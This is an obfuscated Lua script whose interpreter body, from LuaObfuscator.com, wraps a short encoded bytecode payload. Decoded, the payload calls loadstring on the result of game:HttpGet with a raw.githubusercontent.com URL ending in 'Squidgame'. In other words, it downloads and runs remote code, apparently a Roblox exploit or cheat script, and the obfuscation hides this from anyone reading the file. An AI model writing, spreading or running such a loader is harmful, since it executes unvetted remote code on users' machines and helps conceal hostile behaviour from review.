--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v90=0;while true do if (v90==0) then v19=v0(v3(v30,1,1));return "";end end else local v91=v2(v0(v30,16));if v19 then local v111=v5(v91,v19);v19=nil;return v111;else return v91;end end end);local function v20(v31,v32,v33) if v33 then local v92=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-((1 + 1) -(878 -(282 + 595)))) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v92-(v92%(569 -(367 + 201))) ;else local v93=2^(v32-((2565 -(1523 + 114)) -(214 + 713))) ;return (((v31%(v93 + v93))>=v93) and 1) or (0 + 0) ;end end local function v21() local v34=0;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (1066 -(68 + 997)) ;v34=(5534 -4263) -(226 + 1044) ;end end end local function v22() local v36=117 -(32 + 85) ;local v37;local v38;while true do if (v36==(1 + 0)) then return (v38 * (606 -(87 + 263))) + v37 ;end if (v36==((0 -0) + 0)) then v37,v38=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + (4 -2) ;v36=1 + 0 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + (955 -(802 + 150)) );v18=v18 + (10 -(16 -10)) ;return (v42 * (30433252 -13656036)) + (v41 * (47703 + 17833)) + (v40 * (1253 -(534 + 381 + 82))) + v39 ;end local function v24() local v43=v23();local v44=v23();local v45=1 -(1138 -(116 + 1022)) ;local v46=(v20(v44,1188 -(1069 + (491 -373)) ,(27 + 18) -25 ) * ((3 -1)^(6 + 26))) + v43 ;local v47=v20(v44,37 -16 ,31);local v48=((v20(v44,32 + 0 )==((2891 -2099) -(368 + 423))) and  -(3 -2)) or 1 ;if (v47==(18 -(10 + (28 -20)))) then if (v46==((859 -(814 + 45)) -0)) then return v48 * (442 -(416 + 26)) ;else local v112=(0 -0) -0 ;while true do if (v112==(0 + 0 + 0)) then v47=1 + 0 ;v45=0 -0 ;break;end end end elseif (v47==(2485 -((1030 -(261 + 624)) + 293))) then return ((v46==(430 -(44 + 386))) and (v48 * (1/(1486 -(998 + 488))))) or (v48 * NaN) ;end return v8(v48,v47-(325 + 698) ) * (v45 + (v46/(((3 -1) + 0)^(824 -(201 + 571))))) ;end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(1080 -(1020 + 60))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1424 -(630 + 793)) );v18=v18 + v49 ;local v51={};for v67=3 -2 , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v94,v95,v96,v97,v98,v99,v100,v101,v102) local v103=(function() return 0;end)();local v94=(function() return;end)();local v95=(function() return;end)();while true do if (v103==(0 -0)) then local v117=(function() return 0;end)();local v118=(function() return;end)();while true do if (v117~=(0 -0)) then else v118=(function() return 0 -0 ;end)();while true do if (v118==(2 -1)) then v103=(function() return 286 -(134 + 151) ;end)();break;end if (v118==(1665 -(970 + 695))) then v94=(function() return 0;end)();v95=(function() return nil;end)();v118=(function() return 1;end)();end end break;end end end if ((1 -0)==v103) then local v119=(function() return 1990 -(582 + 1408) ;end)();while true do if (v119~=(0 -0)) then else local v123=(function() return 0 -0 ;end)();while true do if (v123~=0) then else while true do if (v94~=(0 -0)) then else v95=(function() return v96();end)();if (v97(v95, #"}", #"}")==(1824 -(1195 + 629))) then local v174=(function() return 0 -0 ;end)();local v175=(function() return;end)();local v176=(function() return;end)();local v177=(function() return;end)();local v178=(function() return;end)();while true do if (v174==0) then local v179=(function() return 0;end)();while true do if (v179~=(242 -(187 + 54))) then else v174=(function() return 1;end)();break;end if (v179~=0) then else v175=(function() return 0;end)();v176=(function() return nil;end)();v179=(function() return 781 -(162 + 618) ;end)();end end end if (v174~=2) then else while true do if (v175== #"19(") then if (v97(v177, #"-19", #"xxx")~= #"\\") then else v178[ #"0836"]=(function() return v98[v178[ #"0836"]];end)();end v99[v100]=(function() return v178;end)();break;end if (v175~= #",") then else local v182=(function() return 0;end)();local v183=(function() return;end)();while true do if (0~=v182) then else v183=(function() return 0;end)();while true do if (v183==1) then v175=(function() return 2 + 0 ;end)();break;end if (v183~=0) then else v178=(function() return {v101(),v101(),nil,nil};end)();if (v176==0) then local v190=(function() return 0 -0 ;end)();local v191=(function() return;end)();while true do if (v190==(0 -0)) then v191=(function() return 0 + 0 ;end)();while true do if (v191~=(1636 -(1373 + 263))) then else v178[ #"xxx"]=(function() return v101();end)();v178[ #".com"]=(function() return v101();end)();break;end end break;end end elseif (v176== #"|") then v178[ #"-19"]=(function() return v102();end)();elseif (v176==(1002 -(451 + 549))) then v178[ #"gha"]=(function() return v102() -((1 + 1)^(24 -8)) ;end)();elseif (v176~= #"xxx") then else local v196=(function() return 0;end)();local v197=(function() return;end)();while true do if (v196~=(0 -0)) then else v197=(function() return 0;end)();while true do if (v197~=(1384 -(746 + 638))) then else v178[ #"-19"]=(function() return v102() -(2^(7 + 9)) ;end)();v178[ #"?id="]=(function() return v101();end)();break;end end break;end end end v183=(function() return 1;end)();end end break;end end end if (v175~=2) then else local v184=(function() return 0;end)();while true do if (v184~=0) then else if (v97(v177, #"\\", #"|")~= #"]") then else v178[2 -0 ]=(function() return v98[v178[2]];end)();end if (v97(v177,343 -(218 + 123) ,2)~= #"<") then else v178[ #"xxx"]=(function() return v98[v178[ #"91("]];end)();end v184=(function() return 1;end)();end if (v184==1) then v175=(function() return  #"-19";end)();break;end end end if (v175==(1581 -(1535 + 46))) then local v185=(function() return 0;end)();local v186=(function() return;end)();while true do if ((0 + 0)==v185) then v186=(function() return 0;end)();while true do if (v186~=(1 + 0)) then else v175=(function() return  #"<";end)();break;end if (v186==0) then v176=(function() return v97(v95,2, #"nil");end)();v177=(function() return v97(v95, #"asd1",6);end)();v186=(function() return 1;end)();end end break;end end end end break;end if (v174~=(561 -(306 + 254))) then else local v180=(function() return 0 + 0 ;end)();while true do if (v180==(1 -0)) then v174=(function() return 1469 -(899 + 568) ;end)();break;end if (v180~=0) then else v177=(function() return nil;end)();v178=(function() return nil;end)();v180=(function() return 1 + 0 ;end)();end end end end end break;end end return v94,v95,v96,v97,v98,v99,v100,v101,v102;end end end end end end end;end)();local v53=(function() return function(v104,v105,v106) local v107=(function() return 0 -0 ;end)();while true do if (v107==(603 -(268 + 335))) then v104[v105-#"|" ]=(function() return v106();end)();return v104,v105,v106;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #"<",v58 do local v70=(function() return 572 -(426 + 146) ;end)();local v71=(function() return;end)();local v72=(function() return;end)();local v73=(function() return;end)();while true do if (v70~=0) then else v71=(function() return 0 + 0 ;end)();v72=(function() return nil;end)();v70=(function() return 1;end)();end if (v70==(1457 -(282 + 1174))) then v73=(function() return nil;end)();while true do if (v71==0) then local v121=(function() return 811 -(569 + 242) ;end)();while true do if (v121~=0) then else v72=(function() return v21();end)();v73=(function() return nil;end)();v121=(function() return 1;end)();end if (v121==(2 -1)) then v71=(function() return 1 + 0 ;end)();break;end end end if (v71~=1) then else if (v72== #":") then v73=(function() return v21()~=(1024 -(706 + 318)) ;end)();elseif (v72==2) then v73=(function() return v24();end)();elseif (v72== #"19(") then v73=(function() return v25();end)();end v59[v69]=(function() return v73;end)();break;end end break;end end end v57[ #"91("]=(function() return v21();end)();for v74= #"{",v23() do FlatIdent_2661B,Descriptor,v21,v20,v59,v54,v74,v22,v23=(function() return v52(FlatIdent_2661B,Descriptor,v21,v20,v59,v54,v74,v22,v23);end)();end for v75= #"{",v23() do v55,v75,v28=(function() return v53(v55,v75,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1];local v65=v61[1253 -(721 + 530) ];local v66=v61[1274 -(945 + 326) ];return function(...) local v76=v64;local v77=v65;local v78=v66;local v79=v27;local v80=2 -(1552 -(1126 + 425)) ;local v81= -(1 + 0);local v82={};local v83={...};local v84=v12("#",...) -(1 + 0) ;local v85={};local v86={};for v108=1500 -(1408 + 92) ,v84 do if (v108>=v78) then v82[v108-v78 ]=v83[v108 + (1087 -(461 + 625)) ];else v86[v108]=v83[v108 + (1289 -(993 + 295)) ];end end local v87=(v84-v78) + 1 + 0 ;local v88;local v89;while true do v88=v76[v80];v89=v88[1172 -(418 + 753) ];if (v89<=(2 + 1)) then if (v89<=(1 + 0)) then if (v89==(0 + 0)) then v86[v88[1 + (406 -(118 + 287)) ]]=v88[532 -(406 + (481 -358)) ];else local v126=1769 -(1749 + 20) ;local v127;local v128;local v129;local v130;while true do if (v126==((1121 -(118 + 1003)) + 0)) then v127=v88[1324 -((3655 -2406) + 73) ];v128,v129=v79(v86[v127](v13(v86,v127 + 1 ,v88[2 + 1 ])));v126=1146 -((843 -(142 + 235)) + 679) ;end if ((v126==(2 -1)) or (2654>=2996)) then v81=(v129 + v127) -1 ;v130=0 -0 ;v126=2;end if ((3978>2104) and (v126==2)) then for v170=v127,v81 do local v171=1900 -(106 + (8138 -6344)) ;while true do if ((0 + 0)==v171) then v130=v130 + 1 ;v86[v170]=v128[v130];break;end end end break;end end end elseif ((2995>1541) and (v89>2)) then local v131=0;local v132;local v133;while true do if (v131==(1 + 0)) then v86[v132 + (2 -1) ]=v133;v86[v132]=v133[v88[10 -(2 + 4) ]];break;end if ((3249>953) and (v131==((1091 -(553 + 424)) -(4 + 110)))) then v132=v88[586 -(57 + 527) ];v133=v86[v88[1430 -(41 + 1386) ]];v131=104 -(17 + 86) ;end end else local v134=(0 -0) + 0 ;local v135;while true do if ((v134==(0 -0)) or (3273>4573)) then v135=v88[(5 + 0) -3 ];v86[v135]=v86[v135](v13(v86,v135 + (167 -(122 + 44)) ,v81));break;end end end elseif (v89<=(8 -3)) then if (v89>((12 + 0) -8)) then do return;end else local v136;local v137,v138;local v139;local v140;v86[v88[2 + 0 ]]={};v80=v80 + 1 + 0 + 0 ;v88=v76[v80];v86[v88[3 -1 ]]=v63[v88[3]];v80=v80 + (66 -(30 + 35)) ;v88=v76[v80];v86[v88[2 + 0 + 0 ]]=v63[v88[1260 -(1043 + 214) ]];v80=v80 + 1 ;v88=v76[v80];v140=v88[(4 + 3) -5 ];v139=v86[v88[1215 -(323 + (1926 -1037)) ]];v86[v140 + ((5 -3) -(2 -1)) ]=v139;v86[v140]=v139[v88[584 -(361 + 219) ]];v80=v80 + (321 -(53 + 267)) ;v88=v76[v80];v86[v88[1 + 1 ]]=v88[416 -(15 + 398) ];v80=v80 + (983 -(18 + 964)) ;v88=v76[v80];v140=v88[7 -5 ];v137,v138=v79(v86[v140](v13(v86,v140 + 1 + 0 ,v88[3])));v81=(v138 + v140) -(1 + 0 + 0) ;v136=850 -(20 + 830) ;for v156=v140,v81 do v136=v136 + 1 ;v86[v156]=v137[v136];end v80=v80 + 1 + 0 ;v88=v76[v80];v140=v88[128 -(116 + 10) ];v86[v140]=v86[v140](v13(v86,v140 + 1 + 0 ,v81));v80=v80 + 1 ;v88=v76[v80];v86[v88[740 -((2619 -2077) + 196) ]]();v80=v80 + (1 -0) ;v88=v76[v80];do return;end end elseif ((v89<=(2 + (757 -(239 + 514)))) or (3151<1284)) then v86[v88[2]]();elseif (v89==(4 + 3)) then v86[v88[2]]=v63[v88[2 + 1 ]];else v86[v88[4 -2 ]]={};end v80=v80 + (2 -1) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403493Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F7A79722Q6F692F7175616E6C792F726566732F68656164732F6D61696E2F537175696467616D6500094Q00047Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
